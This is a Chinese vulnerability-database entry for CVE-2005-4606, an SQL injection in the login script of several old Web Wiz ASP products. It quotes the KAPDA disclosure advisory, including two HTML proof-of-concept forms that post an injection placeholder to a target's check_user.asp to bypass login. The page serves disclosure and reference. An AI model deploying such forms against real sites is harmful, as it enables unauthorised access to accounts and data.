Web Wiz多个产品SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1196683 漏洞类型 SQL注入
发布时间 2005-12-31 更新时间 2006-01-04
CVE编号 CVE-2005-4606 CNNVD-ID CNNVD-200512-685
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2005120081
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-685
|漏洞详情
多个WebWiz产品,含(1)SiteNews3.06及更早版本,(2)Journal1.0及更早版本,(3)Polls3.06及更早版本和(4)DatabaseLogin1.71及更早版本,中的check_user.asp存在SQL注入漏洞,远程攻击者可以通过txtUserName参数来执行任意SQL命令。
|漏洞EXP
 [KAPDA::#18] - WebWiz Products SQL Injection

Happy new year ! :)
KAPDA New advisory

Vulnerable products :

webwiz site news access2000 : vesion 3.06 and prior versions
webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 and prior versions
database login access2000 : version 1.71 and prior versions
webwiz site news access97 : version 3.06 and prior versions
webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 and prior versions
database login access97 : version 1.71 and prior versions

Vendor: http://www.webwizguide.info

Risk: High

Vulnerability: SQL_Injection

Date :
--------------------
Found : Aug 14 2005
Vendor Contacted : Dec 30 2005
Release Date : Dec 30 2005

About WebWiz Products :
--------------------
Vendor`s description

WebWiz site news : http://webwizguide.info/asp/sample_scripts/site_news_script.asp
WebWiz journal : http://webwizguide.info/asp/sample_scripts/journal_application.asp
WebWiz weekly poll : http://webwizguide.info/asp/sample_scripts/weekly_poll_script.asp
WebWiz Password Login Page (Database Login) : http://webwizguide.info/asp/sample_scripts/database_login_script.asp

Discussion :
----------------
Some input passed to "check_user.asp" when logging in isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Vulnerabilities:
--------------------
SQL_Injection in "/[product]/check_user.asp" .
At parameter named 'txtUserName', Attacker can enter SQL command to login to the system.(For all products)

Proof of Concepts:
--------------------

<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

Solution:
--------------------
No patch`s released yet by vendor.

Original Advisory:
--------------------
http://www.kapda.ir/advisory-167.html

Credit :
--------------------
DevilBox of KAPDA
devil_box [at} kapda.ir
Kapda - Security Science Researchers Insitute of Iran
http://www.KAPDA.ir

# SecurityReason thanks farhad
|参考资料

来源:SECUNIA
名称:18263
链接:http://secunia.com/advisories/18263
来源:BUGTRAQ
名称:20051230[KAPDA::#18]-WebWizProductsSQLInjection
链接:http://www.securityfocus.com/archive/1/archive/1/420551/100/0/threaded
来源:BID
名称:16085
链接:http://www.securityfocus.com/bid/16085
来源:OSVDB
名称:22148
链接:http://www.osvdb.org/22148
来源:VUPEN
名称:ADV-2006-0007
链接:http://www.frsirt.com/english/advisories/2006/0007
来源:SREASON
名称:305
链接:http://securityreason.com/securityalert/305